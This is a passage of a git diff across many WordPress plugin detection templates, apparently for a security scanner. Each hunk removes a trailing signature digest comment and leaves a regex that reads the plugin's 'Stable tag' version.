regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205db6d0fd6661bf5bb55f1058ebf5b4c1479cb9c5642beaea9c4c3784e21a95bb022100d15584ee1fd7f027a6b2be1b6f1f1b3a664838d90ab125eb8a5b444126d4fe71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 32017b9a83..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100daf8d56751aea85cbb9670c0a67be5db01afc396f349294857e8c27e22dc79520220331cb77fcb7121c4c2274413917e0df23eb92f5e7540a3575e86156f3eb71c1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 3b582d820c..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d04f8374578ec823707829ed62fa581d4d03a7ad0d95e7c915f0e495416ca3e402200d8518f2b807e7bc8f7c59464c7dc118c8ce7a0795b57140b5094efb9ff58bee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 99ad6cd89b..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fc934984adaaed3a68bc7e24c61b3eeb2acadea8ac1f7fecfc9dff85b37ba3ad022100f2934973261d5d3efd964a22573555066959976c154e0020843ddbc663ee918d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 221f57b45a..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e15e65dd0bb9a24a74326bd56e1656a329b0dd589c9dc0c3060a9ea12d57157402200463487876247765e53cc72e8838047f554c35df9e3685bdd385fa899a3bc9fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 75996e7331..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022000f21680c9f1a1add192e3b21fedf0b07a925ce67c4a1d7a9fe0a4be3c021bbc022100b5eba060bd31874f3ce027a042a30ff32d43578645b30c99d756e5ab3d3882e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index b4010b8535..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220340fa90839e32a95e7eb758f99477fa301feed4a0a53a2acd848c3ae77b615430220778d50c5f21069f937b9cadf278300a8b358c13102e90e80356886da87a2ef2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 7f1c4fc0c6..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201d932003913236331c68d2782d798a25d5a47e3d65d897171857d02732a38e77022100d7dfca11755d9e91433a29f051ce0099cbed6610987b398f58f9b3482d59559c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 636a2499cc..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b85eb4081b46abb2268064e3440c8c1b15a282a11dca509996ec38806b3ffaa2022100f6e24f692648a1e6726d474d580c432cb5b3754b93938236eeec269623b81786:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 722bef2636..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204d6061e3a08480c9d209f1efe4a22669148f07e4b5e0e3025598eaad27c3d992022100ec11c1ee659ad94520bc929d5fd1bd84b9739134c4754040d5f2047fe5394361:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index cbe6e93439..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207f61bd4468140628fbb3d20f12365ae8916333e443d7dce65be3392278c9d68a02206050779c02c5d275f89836f8df60c3ebadc73049d8ef289540dd408b39a5a51c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 3c119e88bf..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eacb2511c79ec05b60206bdcb5926aa96f7c71918418799e287a61d78f527d3f0221009fee4e29e8f5720496caf1f65292baddbdf947da1a4e289fc2fd75bc4e847e02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 2e4336aae1..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b47de9242bdb013a68cf46e6c1775c6ca2497d0bd1748291d7e0d5ec9c81efc9022100b2fc888a578accfc54f3be1cca29b3951230d50448b8bf549c8f1639fb5ad726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 02bebfefee..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206e3251059050ad6385310b93d5b6596cb5328aac5a4ebdc875caeefa38708943022100bce0b885eaa0241d23e6a6bde464c5c46132857beb8d1655b5a7caf9ff286ef4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index dc7637fa47..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024573b6b0b0499c49cb82cc7cd2276397ffeea265e844fa47dc456e8a8660dc9022064fd27f1ff67f58de1a40c5016a943d2a3d92ea43ee3ae91b8c3e52dc738d08e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f15d6ba25a..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022035b29d9f6b3a3ff9da1797f385c1735f9da3c4ff33e3767550148e932596aad7022100ee038b71ec277f0c349175dcb499b0963f90a08eeef925437f55a937f86be405:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 09c610dc47..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022019718774de49a1c210d65a2ec84cb1ff3df3c44d2c0f72da4b3421e13032b3bb02204e181ee4990718fc83e1a0dbd2b5fd651e1b134a6b8cb65352d30a6eac6fcf16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 640ac8e56a..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002f7ffdbfda37feab71d266ca655d1734f37a2197280e70da7da4d3ea629e8cb022100fdbc5a03cb59a59013f42b8aa85103055f1a62ab1d122aa70a4bb833d4071b86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index f6b2761c24..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d7efc51d92c32c0529e0841dd3d182e13f915658a078b4d83ae319769c4d06eb022100e9715e1b522df9abe907d3717b79cc5aacac98d8f26209cee361a44a37f7be6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 09d625c457..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bdc2aa3e799f768eb46bbe9b4485a43da886ef255c317d52bb1e2fd2438f8ad3022100fb71712addc983da8cfd7e1a8ff3c45941cd225daf0581010dd33dabd4731bf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 966ad44c82..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220776166b36e4a56bfb0f1162edaffc08c0ad3c0119c26f5b94373b0274fad4f60022100f15006ef96b5618784f6aa78cb46c986410f4dbc0dd99470d05ea1a5fbb442b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index f4a4ab4d5b..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009d9f48e9857e7e64bfa90e25b9f289bf6ce0772481398131d14faa7037f66e60022100b348a94c976d450274886a6f836dbfb87f3c95d92b9117e136b92e8f61e893dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 163a14b6d5..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cdae23a76e7db806ebb974d64b0934136dbdb9e8c1420baed851adcca0dc34eb022100a80aebf08394076bfe8eacad9341774822ff99d46965f26c5ddfba3d6be50c9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index e30d776154..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201eee9e73d38f379394aeeffc30a02b88fb4e1f2cce7cddc7e9625f88f5699e3b02203a1f852c1185fb7ccf73f4618df01a23bb556edc78e0272941820d53a6c9b790:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 1cab0c7e31..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205621f4d15e4e7ed33a36dc8fa7e3137216cd11507f6ddb15ac34be6a824e6c58022100833c1b303e631dbbabecddd668fd9166dded6b6cd196a3885f6b0f6711c6910e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 951ac3a527..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f3192c3175aed17e526ca15acd5f1b6594e64d760831adf95937ae23700d17c0022061ef94cc7a00dd70efac559085df36cd4c8a6cd6d285b6529a83c2a2191959c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index f243eb18dc..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100adabb681c2e981d525bc678c36a6564eaed405212956167611f3529a5a6227ea022100860b7399f56645b030dd95fa4870336150752d7aede5d675af9d13cb38e6fb81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 38920b265e..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204123ab25b007bfd8e4d708fcde6f5fbbdfec009131c3dda0beebeda841c34aae0220329d9149d42462ab5c3516c9f5ae9572a038f3b56ac718c7dfd62b63cc9ae605:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index a75ad91b3a..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e450d8cf600ff42b19ff2fb838892a27b70782d688fd56fc00fae6030db60e3902202a7d493db8adbcdda86d2c224bca44115664ad093d48c5b03988372c59dbe742:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a170c4179a..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cd6dfcb14f6a18fca657031ce2bf51d6125b69822f833b02c2b91372e2db6276022016e2ebe6685ab797bfaa1b409645483db98351325fdb5be3eb25ff885a6c62da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 628371cd9b..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c747c5e0cd2d751522054fba92540cd617ebf9a2353a59f49874e8e5c40a20b202207b16f54945bfb16f00f1d9bc6ced6803d9ea9678db8f21cce7dc92035423c74d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 1b4346b750..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022022473c8bb0c72d3587572f80dd54945395034cfcd30f5240943acd5250028e45022100e735edf816f058ec8e1b9866aa71c897ec7e1261baaa25cf265abeee2a40c8d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index e22ff6f611..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201daa9511d4a40111de8930b1ac4c1c26c815d6ad6d4c2630d93a37fb1da1018f02204ba71ba14acdb1cc3f1f296a9b9a5a721b8de020a1a2be3b8c75a5c37333b0c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 30f04141e6..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a4cc431703a07c1babdf6e119ddbdfb7ac4a750ade5302e48ab92c4f82a2638b0221009580cd0665e7f2e197b7c92756951fc8e3d4177f433f1d880eb58bc07b27a61b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cdbc2a1a68..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220300184ebd5b19471b8d7519c3082e8981e5dd6e75f4e57a5f48070b17d4d81ef022100e998c73ea8678486fa64367f6b1ae845103cbf9c4f3e8bd6c44c4a79c8bc9030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 77e9474097..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220451caa697dd44db06efc6b6c7d98f2f7265e873edb7ebaba8cfed17e4a57c951022100cda52330304a558270a55650efa501bf9d5fe5b04f9ab01e979a84c94b831930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 30313a89dc..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f33ca5a7a1abc1501062b1e078f0616fdd57a2543e5dd963da1ff8b820eba9fe022100e3f227aaaebf0e0ca52f8263510e256026d647ad1cf2c12e4e3dee1291b8a73d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 7056b44884..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a128f332b2211fb2848312a2e27c87343ecde21b89986fba3d25278613e31f84022100b71bda84fd5d02835997243b793ed7afa40ce721bd5cb19a3cbd2dab73e6cfe1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index aee6443ca1..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220087f053070d43e1ce8add1d5f24176d85d297bad70849d43abf6389e240bd6be02203354741deb40c9ae9041c98418ee8c5c26a161b65da27daa61b77cbd16b94c44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 9db5083d8c..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210081f25a89a7f622af54f5fff8e65bcfadfa919d90b12c594318510b45a70079730220235470bbbe08642c5e422f7f4c5e4d7155fea78b5532b7b8f8b09cdee1a0b51e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index e924c6d56b..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022030a9e2785beb7d5a4ba781dfa752e9e89e97614f77387ed7e70c83d8ee4551ff02206c7f2e526f706e7b3b50d1d3eef45afa361ac5b5d82a3cf8c75d9df71b37e3b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index d316c499eb..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b820bf1777f66c9820a53e517be3fbca2ebe0cf7253bef924a7f0315168af5ea02202276f23e8ae5a560d07e6f9263a6c125e1883a5a58427cd4e6b737419dd5ab5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 5647ab5e96..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210091942b6b52fb9843bf49208ff7eb3a3e68bf09464e7f5af69544348ecbaaea2b02210091772d2ba599964c2291e8d4ce77428e26997c03d8455aa02719e90a9d02594b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 17ea404d25..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022070192a9a93725f31cb5da833a0272b7f433cab958c4ec039eb60c140daa3dae302201624f54aad5978e7285a5011b28ee7082f704cf2f9c25296fd3bac19f4c95187:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 3e7a5ac384..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210082382b99510975e18e932da49e39224ee5b3aa59f817212d9f5fa2d21d24c088022100d59058a33ed603c403a4bd16d1a4d90d123aa60c1a478316283c10b3f8e089d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index dcdddf0945..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203aafb037bd942f7983044cd4da9cb599b076b657f5cf091abcd725618ffa24f8022100b287135671e1470c2d660b6c93d65a7a64211c1b2ede23d26280665fbd634c4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index bd76151118..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100879aa6608131672f897963612d19d3dceaff33ab5049129f1fa73c20e9f22296022100b6847252ae541c6cfb7a6f14b81cf80a784aa17ea096afccf0019fe010919187:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index fcefa44f50..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 